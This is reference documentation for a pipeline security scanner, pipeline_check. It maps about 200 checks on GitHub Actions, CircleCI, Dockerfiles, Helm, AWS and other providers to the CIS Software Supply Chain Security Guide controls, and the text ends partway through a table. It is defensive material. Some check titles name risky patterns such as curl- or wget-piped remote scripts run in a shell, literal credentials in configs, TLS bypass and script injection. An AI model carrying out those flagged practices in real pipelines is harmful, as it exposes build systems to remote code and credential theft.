CIS Software Supply Chain Security Guide
- Version: 1.0
- URL: https://www.cisecurity.org/benchmark/software_supply_chain_security
- Source of truth:
pipeline_check/core/standards/data/cis_supply_chain.py
CIS Software Supply Chain Security Guide. Source, build, dependency, and artifact controls covering the full pipeline trust chain.
At a glance
- Controls in this standard: 25
- Controls evidenced by at least one check: 25 / 25
- Distinct checks evidencing this standard: 197
- Of those, autofixable with
--fix: 43
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, signed-into-an-unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
1.1.5 |
Ensure any change to code requires the review of additional strong authenticators | 9 | 2H · 6M · 1L |
1.1.6 |
Ensure any change to code is signed | 1 | 1M |
1.1.7 |
Ensure any change to code is automatically scanned for risks (SAST) | 2 | 2M |
1.1.8 |
Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA) | 1 | 1M |
1.1.17 |
Ensure default branches' commits are protected from being deleted/rewritten | 4 | 3H · 1L |
1.3.4 |
Ensure organization identity is required for contribution (no long-lived personal tokens) | 6 | 4H · 2M |
1.4.1 |
Ensure third-party artifacts and open-source libraries are verified | 36 | 2C · 21H · 9M · 4L |
1.5.1 |
Ensure scanners are in place to identify and prevent sensitive data in code | 2 | 2H |
2.1.3 |
Ensure the build environment is hardened | 32 | 8C · 16H · 7M · 1L |
2.1.6 |
Ensure build workers have minimal network connectivity | 8 | 1C · 3H · 4M |
2.2.2 |
Ensure build workers are single-use | 7 | 3M · 4L |
2.3.4 |
Ensure pipelines are scanned for secrets and sensitive data | 14 | 9C · 3H · 1M · 1L |
2.3.7 |
Ensure pipeline steps produce audit logs | 5 | 1H · 2M · 2L |
2.3.8 |
Ensure pipeline configuration files are reviewed before execution | 16 | 3C · 6H · 4M · 3L |
2.4.2 |
Ensure pipeline integrity, artifacts are signed by the pipeline | 4 | 4M |
2.4.3 |
Ensure access to the pipeline execution environment is restricted | 17 | 6C · 3H · 8M |
3.1.3 |
Ensure signed metadata of dependencies is verified | 25 | 1C · 10H · 14M |
3.1.5 |
Ensure only trusted package managers and repositories are used | 20 | 18H · 1M · 1L |
4.1.1 |
Ensure all artifacts on all releases are verified (signed, integrity-checked) | 17 | 3H · 14M |
4.2.1 |
Ensure access to artifacts is limited | 4 | 2C · 1H · 1M |
4.3.3 |
Ensure package registries use authentication and authorisation | 1 | 1C |
4.4.1 |
Ensure artifacts have provenance/SBOM metadata | 19 | 1H · 13M · 5L |
5.1.4 |
Ensure deployment configuration manifests are reviewed before apply | 8 | 2H · 6M |
5.2.1 |
Ensure deployment environments are separated | 4 | 1H · 3M |
5.2.3 |
Ensure deployment environment activity is audited | 2 | 1M · 1L |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard cis_supply_chain:
# All providers, only checks tied to this standard
pipeline_check --standard cis_supply_chain
# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard cis_supply_chain
# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard cis_supply_chain --standard owasp_cicd_top_10
Controls in scope
1.1.5: Ensure any change to code requires the review of additional strong authenticators
Evidenced by 9 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-002 |
Default branch protection does not require pull request reviews | HIGH | SCM | |
SCM-008 |
Default branch protection does not require status checks | MEDIUM | SCM | |
SCM-010 |
Branch protection allows administrators to bypass | HIGH | SCM | |
SCM-011 |
Default branch protection does not require CODEOWNERS reviews | MEDIUM | SCM | |
SCM-012 |
Default branch protection keeps stale reviews after a push | MEDIUM | SCM | |
SCM-013 |
Default branch protection does not require conversation resolution | LOW | SCM | |
SCM-014 |
Default branch protection does not require approval of the most recent push | MEDIUM | SCM | |
SCM-017 |
Repository has no CODEOWNERS file | MEDIUM | SCM | |
SCM-018 |
Required PR reviews can be bypassed by named identities | MEDIUM | SCM |
1.1.6: Ensure any change to code is signed
Evidenced by 1 check across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-006 |
Default branch protection does not require signed commits | MEDIUM | SCM |
1.1.7: Ensure any change to code is automatically scanned for risks (SAST)
Evidenced by 2 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-003 |
GitHub default code scanning is not enabled | MEDIUM | SCM | |
SCM-008 |
Default branch protection does not require status checks | MEDIUM | SCM |
1.1.8: Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA)
Evidenced by 1 check across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-005 |
Dependabot security updates are not enabled | MEDIUM | SCM |
1.1.17: Ensure default branches' commits are protected from being deleted/rewritten
Evidenced by 4 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-001 |
Default branch has no protection rule | HIGH | SCM | |
SCM-007 |
Default branch protection allows force-pushes | HIGH | SCM | |
SCM-009 |
Default branch protection allows branch deletion | HIGH | SCM | |
SCM-019 |
Push restrictions allowlist names individual users | LOW | SCM |
1.3.4: Ensure organization identity is required for contribution (no long-lived personal tokens)
Evidenced by 6 checks across 3 providers (AWS, CircleCI, GitHub Actions).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CB-006 |
CodeBuild source auth uses long-lived token | HIGH | AWS | |
CC-005 |
AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
CC-019 |
add_ssh_keys without fingerprint restriction |
HIGH | CircleCI | |
CP-004 |
Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
GHA-005 |
AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS |
1.4.1: Ensure third-party artifacts and open-source libraries are verified
Evidenced by 36 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, SCM, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ADO-005 |
Container image not pinned to specific version | HIGH | Azure DevOps | |
ARGO-001 |
Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
ARGO-012 |
No vulnerability scanning step | MEDIUM | Argo Workflows | |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
BK-012 |
No vulnerability scanning step | MEDIUM | Buildkite | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-016 |
Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
CC-020 |
No vulnerability scanning step | MEDIUM | CircleCI | |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
DF-010 |
apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
DF-011 |
Package manager install without cache cleanup in same layer | LOW | Dockerfile | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-004 |
dynamicSubstitutions on with user substitutions in step args | HIGH | Cloud Build | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
GCB-012 |
Credential-shaped literal in pipeline body | CRITICAL | Cloud Build | |
GCB-025 |
Build has no tags for audit / discoverability | LOW | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GHA-040 |
Action reference matches a known-compromised SHA or tag | CRITICAL | GitHub Actions | |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-001 |
Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
HELM-008 |
Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
SCM-016 |
Private vulnerability reporting is not enabled | LOW | SCM | |
TKN-001 |
Tekton step image not pinned to a digest | HIGH | Tekton | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
TKN-012 |
No vulnerability scanning step | MEDIUM | Tekton |
1.5.1: Ensure scanners are in place to identify and prevent sensitive data in code
Evidenced by 2 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
SCM-004 |
GitHub secret scanning is not enabled | HIGH | SCM | |
SCM-015 |
Secret scanning push protection is not enabled | HIGH | SCM |
2.1.3: Ensure the build environment is hardened
Evidenced by 32 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ARGO-002 |
Argo template container runs privileged or as root | HIGH | Argo Workflows | |
ARGO-004 |
Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
ARGO-005 |
Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BK-003 |
Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
BK-005 |
Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
CB-002 |
Privileged mode enabled | HIGH | AWS | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
CC-002 |
Script injection via untrusted environment variable | HIGH | CircleCI | |
CC-010 |
Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
CC-012 |
Dynamic config via setup: true enables code injection |
MEDIUM | CircleCI | |
CC-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
DF-002 |
Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
DF-005 |
RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
DF-008 |
RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
DF-012 |
RUN invokes sudo | HIGH | Dockerfile | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
DF-014 |
WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
DF-015 |
RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
DF-017 |
ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
DF-018 |
RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
ECR-004 |
No lifecycle policy configured | LOW | AWS | |
GCB-002 |
Cloud Build uses the default service account | HIGH | Cloud Build | |
GCB-016 |
Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
GCB-019 |
Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
GHA-002 |
pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
GHA-003 |
Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
TKN-002 |
Tekton step runs privileged or as root | HIGH | Tekton | |
TKN-003 |
Tekton param interpolated unsafely in step script | CRITICAL | Tekton | |
TKN-004 |
Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton |
2.1.6: Ensure build workers have minimal network connectivity
Evidenced by 8 checks across 4 providers (AWS, CircleCI, Cloud Build, Dockerfile).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CB-002 |
Privileged mode enabled | HIGH | AWS | |
CC-010 |
Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
CC-014 |
Job missing resource_class declaration |
MEDIUM | CircleCI | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
GCB-010 |
Remote script piped to shell interpreter | HIGH | Cloud Build | |
GCB-013 |
Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
GCB-021 |
No private worker pool, build runs on the shared default pool | MEDIUM | Cloud Build | 🔧 fix |
PBAC-001 |
CodeBuild project has no VPC configuration | HIGH | AWS |
2.2.2: Ensure build workers are single-use
Evidenced by 7 checks across 6 providers (AWS, Argo Workflows, Bitbucket, Buildkite, CircleCI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-007 |
Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
BB-005 |
Step has no max-time, unbounded build |
MEDIUM | Bitbucket | 🔧 fix |
BK-006 |
Step has no timeout_in_minutes | LOW | Buildkite | |
CB-004 |
No build timeout configured | LOW | AWS | |
CC-015 |
No no_output_timeout configured |
MEDIUM | CircleCI | 🔧 fix |
PBAC-002 |
CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
TKN-006 |
Tekton run lacks an explicit timeout | LOW | Tekton |
2.3.4: Ensure pipelines are scanned for secrets and sensitive data
Evidenced by 14 checks across 10 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-003 |
Variables contain literal secret values | CRITICAL | Azure DevOps | |
ARGO-006 |
Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
BB-003 |
Variables contain literal secret values | CRITICAL | Bitbucket | |
BK-002 |
Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
CB-001 |
Secrets in plaintext environment variables | CRITICAL | AWS | |
CC-004 |
Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
CC-008 |
Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
DF-006 |
ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
DF-019 |
COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
DF-020 |
ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
GCB-003 |
Secret Manager value referenced in step args | HIGH | Cloud Build | |
GCB-005 |
Build timeout unset or excessive | LOW | Cloud Build | 🔧 fix |
GL-003 |
Variables contain literal secret values | CRITICAL | GitLab CI | |
TKN-005 |
Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
2.3.7: Ensure pipeline steps produce audit logs
Evidenced by 5 checks across 3 providers (AWS, CircleCI, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CB-003 |
Build logging not enabled | MEDIUM | AWS | |
CC-011 |
No store_test_results step (test results not archived) | LOW | CircleCI | |
GCB-006 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
GCB-017 |
Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
S3-004 |
Artifact bucket access logging not enabled | LOW | AWS |
2.3.8: Ensure pipeline configuration files are reviewed before execution
Evidenced by 16 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ARGO-005 |
Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BK-003 |
Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
BK-007 |
Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
CB-007 |
CodeBuild webhook has no filter group | MEDIUM | AWS | |
CC-009 |
Deploy job missing manual approval gate | MEDIUM | CircleCI | |
CC-013 |
Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
CP-001 |
No approval action before deploy stages | HIGH | AWS | |
CP-003 |
Source stage using polling instead of event-driven trigger | LOW | AWS | |
GCB-014 |
Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
GCB-022 |
options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
GHA-002 |
pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
HELM-006 |
Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
TKN-003 |
Tekton param interpolated unsafely in step script | CRITICAL | Tekton |
2.4.2: Ensure pipeline integrity, artifacts are signed by the pipeline
Evidenced by 4 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
GCB-008 |
No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
GCB-015 |
SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
GCB-023 |
Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build |
2.4.3: Ensure access to the pipeline execution environment is restricted
Evidenced by 17 checks across 9 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-003 |
Variables contain literal secret values | CRITICAL | Azure DevOps | |
ARGO-003 |
Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
BB-003 |
Variables contain literal secret values | CRITICAL | Bitbucket | |
CB-001 |
Secrets in plaintext environment variables | CRITICAL | AWS | |
CC-004 |
Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
CC-008 |
Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
GCB-026 |
Step waitFor: references an unknown step id | MEDIUM | Cloud Build | |
GHA-004 |
Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
GL-003 |
Variables contain literal secret values | CRITICAL | GitLab CI | |
IAM-001 |
CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
IAM-002 |
CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
IAM-003 |
CI/CD role has no permission boundary | MEDIUM | AWS | |
IAM-004 |
CI/CD role can PassRole to any role | HIGH | AWS | |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
IAM-006 |
Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
PBAC-002 |
CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
TKN-007 |
Tekton run uses the default ServiceAccount | MEDIUM | Tekton |
3.1.3: Ensure signed metadata of dependencies is verified
Evidenced by 25 checks across 10 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-001 |
Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
ARGO-012 |
No vulnerability scanning step | MEDIUM | Argo Workflows | |
BK-008 |
TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
BK-012 |
No vulnerability scanning step | MEDIUM | Buildkite | |
CC-020 |
No vulnerability scanning step | MEDIUM | CircleCI | |
CC-021 |
Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
CC-022 |
Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-004 |
dynamicSubstitutions on with user substitutions in step args | HIGH | Cloud Build | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
GHA-040 |
Action reference matches a known-compromised SHA or tag | CRITICAL | GitHub Actions | |
GHA-041 |
Action upstream repo has a single contributor | MEDIUM | GitHub Actions | |
GHA-042 |
Action upstream repo is newly created | MEDIUM | GitHub Actions | |
GHA-043 |
Low-star action runs with sensitive permissions | HIGH | GitHub Actions | |
GHA-047 |
Action ref resolves to a recently committed tag or SHA | MEDIUM | GitHub Actions | |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-001 |
Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
HELM-008 |
Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
TKN-001 |
Tekton step image not pinned to a digest | HIGH | Tekton | |
TKN-012 |
No vulnerability scanning step | MEDIUM | Tekton |
3.1.5: Ensure only trusted package managers and repositories are used
Evidenced by 20 checks across 11 providers (Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ADO-005 |
Container image not pinned to specific version | HIGH | Azure DevOps | |
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-016 |
Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
CC-018 |
Package install from insecure source | HIGH | CircleCI | 🔧 fix |
CC-023 |
TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
GCB-011 |
TLS / certificate verification bypass | HIGH | Cloud Build | 🔧 fix |
GCB-018 |
Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
HELM-009 |
Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
4.1.1: Ensure all artifacts on all releases are verified (signed, integrity-checked)
Evidenced by 17 checks across 10 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-006 |
Artifacts not signed | MEDIUM | Azure DevOps | |
ARGO-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
ARGO-011 |
No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
BB-006 |
Artifacts not signed | MEDIUM | Bitbucket | |
BK-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
CC-006 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
ECR-005 |
Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
GHA-006 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | GitHub Actions | |
GL-006 |
Artifacts not signed | MEDIUM | GitLab CI | |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
S3-002 |
Artifact bucket server-side encryption not configured | HIGH | AWS | |
S3-003 |
Artifact bucket versioning not enabled | MEDIUM | AWS | |
TKN-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
TKN-011 |
No SLSA provenance attestation produced | MEDIUM | Tekton |
4.2.1: Ensure access to artifacts is limited
Evidenced by 4 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ECR-003 |
Repository policy allows public access | CRITICAL | AWS | |
GCB-020 |
serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
S3-001 |
Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
S3-005 |
Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS |
4.3.3: Ensure package registries use authentication and authorisation
Evidenced by 1 check across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ECR-003 |
Repository policy allows public access | CRITICAL | AWS |
4.4.1: Ensure artifacts have provenance/SBOM metadata
Evidenced by 19 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-007 |
SBOM not produced | MEDIUM | Azure DevOps | |
ARGO-010 |
No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
ARGO-011 |
No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
BB-007 |
SBOM not produced | MEDIUM | Bitbucket | |
BK-010 |
No SBOM generated for build artifacts | MEDIUM | Buildkite | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
CC-007 |
SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
DF-016 |
Image lacks OCI provenance labels | LOW | Dockerfile | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
GCB-009 |
Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
GCB-024 |
Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
GHA-007 |
SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | GitHub Actions | |
GL-007 |
SBOM not produced | MEDIUM | GitLab CI | |
HELM-005 |
Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
HELM-007 |
Chart.yaml description field is empty or missing | LOW | Helm | |
HELM-010 |
Chart.yaml appVersion field is empty or missing | LOW | Helm | |
S3-003 |
Artifact bucket versioning not enabled | MEDIUM | AWS | |
TKN-010 |
No SBOM generated for build artifacts | MEDIUM | Tekton | |
TKN-011 |
No SLSA provenance attestation produced | MEDIUM | Tekton |
5.1.4: Ensure deployment configuration manifests are reviewed before apply
Evidenced by 8 checks across 6 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-004 |
Deployment job missing environment binding | MEDIUM | Azure DevOps | |
BB-004 |
Deploy step missing deployment: environment gate |
MEDIUM | Bitbucket | |
BK-007 |
Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
CC-009 |
Deploy job missing manual approval gate | MEDIUM | CircleCI | |
CD-001 |
Automatic rollback on failure not enabled | MEDIUM | AWS | |
CD-002 |
AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
CP-001 |
No approval action before deploy stages | HIGH | AWS | |
GL-004 |
Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI |
5.2.1: Ensure deployment environments are separated
Evidenced by 4 checks across 4 providers (AWS, Azure DevOps, Bitbucket, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-004 |
Deployment job missing environment binding | MEDIUM | Azure DevOps | |
BB-004 |
Deploy step missing deployment: environment gate |
MEDIUM | Bitbucket | |
CD-002 |
AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
GL-004 |
